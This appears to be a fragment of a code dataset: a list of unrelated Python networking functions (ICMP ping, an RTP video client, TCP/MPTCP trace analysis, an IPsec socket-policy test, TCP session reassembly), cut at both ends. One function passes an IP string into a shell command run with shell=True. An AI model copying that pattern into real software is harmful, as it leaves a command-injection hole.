(16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum\n # struct.pack(fmt, v1, v2, ...)\n # Return a string containing the values v1, v2, ... packed\n # according to the given format.\n # b:signed char, h:short 2, H:unsigned short 2\n header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)\n # struct.calcsize(fmt)\n # Return the size of the struct corresponding to the given format.\n byte_in_double = struct.calcsize(\"d\") # C type: double\n data = (192 - byte_in_double) * \"P\" # any char is OK, any length is OK\n data = struct.pack(\"d\", time.clock()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = get_checksum(header + data)\n\n # It's just easier to make up a new header than to stuff it into the dummy.\n # socket.htons(x)\n # Convert 16-bit positive integers from host to network byte order.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1)\n packet = header + data\n # my_socket.sendto(packet, (ip, 1)) # getsockaddrarg() takes exactly 2 arguments\n my_socket.sendto(packet, (ip, 80)) # it seems that 0~65535 is OK (port?)", "def listen_rtp(self):\n one_frame_data = \"\"\n fault_mark = 'ack'\n currFrameNbr = 0\n last_time_fault = False\n self.cc = 0\n while True:\n try:\n if self.nak_num + self.ack_num != 0:\n self.lose_rate.setText(str(self.nak_num / (self.nak_num + self.ack_num))[:5])\n data = self.rtp_socket.recv(65536)\n if data:\n self.time_flag = 1\n rtpPacket = RtpPacket()\n rtpPacket.decode(data)\n currFrameNbr = rtpPacket.seqNum()\n marker = rtpPacket.getMarker()\n pt = rtpPacket.payloadType()\n\n self.cc = rtpPacket.get_csrc()\n if currFrameNbr != self.frame_num + 1: # order error\n fault_mark = 'nak 1'\n last_time_fault = True\n elif marker == 1 and not last_time_fault and fault_mark == 'ack': # end, no error\n # update some parameter\n self.ack_num += 1\n self.frame_num = 0\n self.curr_frame += 1\n self.percent = float(self.curr_frame / self.total_frame)\n self.video_slider.setValue(self.curr_frame)\n # send rtcp\n rtcpPacket = RtcpPacket()\n ssrc = random.randint(556, 10000)\n rtcpPacket.encode(2, 0, 1, 200, ssrc, 16, fault_mark.encode())\n packet = rtcpPacket.getPacket()\n\n self.rtcp_socket.sendto(packet, ('127.0.0.1', self.rtcp_port))\n if one_frame_data == \"\":\n one_frame_data = rtpPacket.getPayload()\n else:\n one_frame_data += rtpPacket.getPayload()\n\n time_sleep = self.play_delay\n time.sleep(time_sleep)\n cache_name = self.write_frame(one_frame_data)\n self.update_movie(cache_name)\n\n # reset parameter\n one_frame_data = \"\"\n fault_mark = 'ack'\n last_time_fault = False\n\n elif marker == 1 and last_time_fault: # end, with error\n self.nak_num += 1\n self.rtcp_socket.sendto(fault_mark.encode(), ('127.0.0.1', self.rtcp_port))\n one_frame_data = \"\"\n fault_mark = 'ack'\n last_time_fault = False\n self.frame_num = 0\n else:\n self.frame_num = currFrameNbr\n if one_frame_data == \"\":\n one_frame_data = rtpPacket.getPayload()\n else:\n one_frame_data += rtpPacket.getPayload()\n except:\n # 超时处理\n if self.play_event.isSet():\n break\n if self.teardown_ack == 1:\n self.rtp_socket.shutdown(socket.SHUT_RDWR)\n self.rtp_socket.close()\n break\n\n if (not self.play_event.isSet()) and self.teardown_ack == 0:\n self.nak_num += 1\n # 之前没有出现错误,仅仅是最后的超时错误\n if not last_time_fault:\n fault_mark = 'nak ' + str(currFrameNbr + 1)\n # 之前出现错误, 帧归0\n if last_time_fault:\n self.frame_num = 0\n self.rtcp_socket.sendto(fault_mark.encode(), ('127.0.0.1', self.rtcp_port))\n last_time_fault = False\n fault_mark = 'ack'", "def test_udp_bad_server():\n assert dnsck_query(\"8.8.8.88\", \"google.com\", \"A\", 1) == 1", "def process_mptcp_syn_ack(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport, black_list, fast_conns, ts_syn_timeout, ts_timeout):\n # The sender of the SYN/ACK is the server\n if (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and acks[daddr, dport, saddr, sport][co.C2S] == -1):\n # Better to check, if not seen, maybe uncomplete TCP connection\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta\n\n elif (daddr, dport, saddr, sport) in acks and ((ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][CLIENT]).total_seconds() < ts_timeout\n and tcp.ack == acks[daddr, dport, saddr, sport][co.C2S]):\n # SYN/ACK retransmission! But don't do anything special\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[acks[daddr, dport, saddr, sport][co.CONN_ID]][co.TIMESTAMP][SERVER] = ts_delta", "def process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[daddr, dport, saddr, sport][co.C2S] >= 0:\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.C2S][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[daddr, dport, saddr, sport][co.C2S]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.C2S][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if size_payload > 0 and tcp.seq in acks[daddr, dport, saddr, sport][SEQ_S2C]:\n # This is a retransmission!\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][0],\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1],\n ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER]))\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[daddr, dport, saddr, sport][SEQ_S2C].add(tcp.seq)\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[daddr, dport, saddr, sport][SEQ][co.S2C]) >= 3000000:\n# for x in range(50000):\n# acks[daddr, dport, saddr, sport][SEQ][co.S2C].popleft()\n\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta", "def translate_control_packet(self, multicast_packet):", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def send_events(sock):\n i=0\n while i<10:\n log.info('Sending message from publisher..')\n sock.send(\"even - hai i am publisher\")\n time.sleep(0.2)\n i += 1", "def create_icmp_send_socket():\n sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n return sock", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def test_keep_alive_sent(self):\n # Receive keep-alive message\n msg = self.sock.recv(4096)\n self.assertTrue(msg.startswith(b\"\\x55\\xaa\"))\n # Send some arbitrary response\n self.sock.send(bytes.fromhex(\"55 aa 01 02 02 00 00 01 04\"))\n # Receive another keep-alive message\n msg = self.sock.recv(4096)\n self.assertTrue(msg.startswith(b\"\\x55\\xaa\"))\n # Send some arbitrary response\n self.sock.send(bytes.fromhex(\"55 aa 01 02 02 00 00 01 04\"))", "def test_notice_on_double_request(arp):\n\n e = Ether(src='00:11:22:aa:bb:ca', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:ca', hwdst='00:00:00:00:00:00', psrc='10.0.0.2', pdst='10.0.0.1', op='who-has')\n\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n response = arp.receive_packet(e / a)\n assert type(response) is NoticeRespone", "def forward(p):\n try:\n if IP in p and p[IP].dst == RD_ADRRESS and p[Ether].src != GW_MAC_ADRRESS and p[Ether].dst == GW_MAC_ADRRESS:\n if p[IP].src not in black_list:\n send(p[1::], iface=IFACE, verbose=0)\n except:\n print(\"error in forward\")\n finally:\n sys.exit()", "def icmp_probe(self, ip):\n\n\t\tcmd = 'ping %s -n 10' % ip\n\t\tp = Popen(cmd, shell=True, stdin=PIPE, stderr=PIPE, stdout=PIPE)\n\t\tres = p.stdout.read()\n\n\t\tres = res.decode()\n\t\tif len(p.stderr.read()) == 0:\n\t\t\tif 'Destination host unreachable' in res:\n\t\t\t\treturn False\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def ParamTestSocketPolicySimple(self, params):\n\n def AssertEncrypted(packet):\n # This gives a free pass to ICMP and ICMPv6 packets, which show up\n # nondeterministically in tests.\n self.assertEquals(None,\n packet.getlayer(scapy.UDP),\n \"UDP packet sent in the clear\")\n self.assertEquals(None,\n packet.getlayer(scapy.TCP),\n \"TCP packet sent in the clear\")\n\n # We create a pair of sockets, \"left\" and \"right\", that will talk to each\n # other using transport mode ESP. Because of TapTwister, both sockets\n # perceive each other as owning \"remote_addr\".\n netid = self.RandomNetid()\n family = net_test.GetAddressFamily(params[\"version\"])\n local_addr = self.MyAddress(params[\"version\"], netid)\n remote_addr = self.GetRemoteSocketAddress(params[\"version\"])\n crypt_left = (xfrm.XfrmAlgo((\n params[\"crypt\"].name,\n params[\"crypt\"].key_len)),\n os.urandom(params[\"crypt\"].key_len / 8)) if params[\"crypt\"] else None\n crypt_right = (xfrm.XfrmAlgo((\n params[\"crypt\"].name,\n params[\"crypt\"].key_len)),\n os.urandom(params[\"crypt\"].key_len / 8)) if params[\"crypt\"] else None\n auth_left = (xfrm.XfrmAlgoAuth((\n params[\"auth\"].name,\n params[\"auth\"].key_len,\n params[\"auth\"].trunc_len)),\n os.urandom(params[\"auth\"].key_len / 8)) if params[\"auth\"] else None\n auth_right = (xfrm.XfrmAlgoAuth((\n params[\"auth\"].name,\n params[\"auth\"].key_len,\n params[\"auth\"].trunc_len)),\n os.urandom(params[\"auth\"].key_len / 8)) if params[\"auth\"] else None\n aead_left = (xfrm.XfrmAlgoAead((\n params[\"aead\"].name,\n params[\"aead\"].key_len,\n params[\"aead\"].icv_len)),\n os.urandom(params[\"aead\"].key_len / 8)) if params[\"aead\"] else None\n aead_right = (xfrm.XfrmAlgoAead((\n params[\"aead\"].name,\n params[\"aead\"].key_len,\n params[\"aead\"].icv_len)),\n os.urandom(params[\"aead\"].key_len / 8)) if params[\"aead\"] else None\n spi_left = 0xbeefface\n spi_right = 0xcafed00d\n req_ids = [100, 200, 300, 400] # Used to match templates and SAs.\n\n # Left outbound SA\n self.xfrm.AddSaInfo(\n src=local_addr,\n dst=remote_addr,\n spi=spi_right,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[0],\n encryption=crypt_right,\n auth_trunc=auth_right,\n aead=aead_right,\n encap=None,\n mark=None,\n output_mark=None)\n # Right inbound SA\n self.xfrm.AddSaInfo(\n src=remote_addr,\n dst=local_addr,\n spi=spi_right,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[1],\n encryption=crypt_right,\n auth_trunc=auth_right,\n aead=aead_right,\n encap=None,\n mark=None,\n output_mark=None)\n # Right outbound SA\n self.xfrm.AddSaInfo(\n src=local_addr,\n dst=remote_addr,\n spi=spi_left,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[2],\n encryption=crypt_left,\n auth_trunc=auth_left,\n aead=aead_left,\n encap=None,\n mark=None,\n output_mark=None)\n # Left inbound SA\n self.xfrm.AddSaInfo(\n src=remote_addr,\n dst=local_addr,\n spi=spi_left,\n mode=xfrm.XFRM_MODE_TRANSPORT,\n reqid=req_ids[3],\n encryption=crypt_left,\n auth_trunc=auth_left,\n aead=aead_left,\n encap=None,\n mark=None,\n output_mark=None)\n\n # Make two sockets.\n sock_left = socket(family, params[\"proto\"], 0)\n sock_left.settimeout(2.0)\n sock_left.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n self.SelectInterface(sock_left, netid, \"mark\")\n sock_right = socket(family, params[\"proto\"], 0)\n sock_right.settimeout(2.0)\n sock_right.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n self.SelectInterface(sock_right, netid, \"mark\")\n\n # For UDP, set SO_LINGER to 0, to prevent TCP sockets from hanging around\n # in a TIME_WAIT state.\n if params[\"proto\"] == SOCK_STREAM:\n net_test.DisableFinWait(sock_left)\n net_test.DisableFinWait(sock_right)\n\n # Apply the left outbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_left, family, xfrm.XFRM_POLICY_OUT,\n spi_right, req_ids[0], None)\n # Apply right inbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_right, family, xfrm.XFRM_POLICY_IN,\n spi_right, req_ids[1], None)\n # Apply right outbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_right, family, xfrm.XFRM_POLICY_OUT,\n spi_left, req_ids[2], None)\n # Apply left inbound socket policy.\n xfrm_base.ApplySocketPolicy(sock_left, family, xfrm.XFRM_POLICY_IN,\n spi_left, req_ids[3], None)\n\n server_ready = threading.Event()\n server_error = None # Save exceptions thrown by the server.\n\n def TcpServer(sock, client_port):\n try:\n sock.listen(1)\n server_ready.set()\n accepted, peer = sock.accept()\n self.assertEquals(remote_addr, peer[0])\n self.assertEquals(client_port, peer[1])\n data = accepted.recv(2048)\n self.assertEquals(\"hello request\", data)\n accepted.send(\"hello response\")\n except Exception as e:\n server_error = e\n finally:\n sock.close()\n\n def UdpServer(sock, client_port):\n try:\n server_ready.set()\n data, peer = sock.recvfrom(2048)\n self.assertEquals(remote_addr, peer[0])\n self.assertEquals(client_port, peer[1])\n self.assertEquals(\"hello request\", data)\n sock.sendto(\"hello response\", peer)\n except Exception as e:\n server_error = e\n finally:\n sock.close()\n\n # Server and client need to know each other's port numbers in advance.\n wildcard_addr = net_test.GetWildcardAddress(params[\"version\"])\n sock_left.bind((wildcard_addr, 0))\n sock_right.bind((wildcard_addr, 0))\n left_port = sock_left.getsockname()[1]\n right_port = sock_right.getsockname()[1]\n\n # Start the appropriate server type on sock_right.\n target = TcpServer if params[\"proto\"] == SOCK_STREAM else UdpServer\n server = threading.Thread(\n target=target,\n args=(sock_right, left_port),\n name=\"SocketServer\")\n server.start()\n # Wait for server to be ready before attempting to connect. TCP retries\n # hide this problem, but UDP will fail outright if the server socket has\n # not bound when we send.\n self.assertTrue(server_ready.wait(2.0), \"Timed out waiting for server thread\")\n\n with TapTwister(fd=self.tuns[netid].fileno(), validator=AssertEncrypted):\n sock_left.connect((remote_addr, right_port))\n sock_left.send(\"hello request\")\n data = sock_left.recv(2048)\n self.assertEquals(\"hello response\", data)\n sock_left.close()\n server.join()\n if server_error:\n raise server_error", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = [((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n 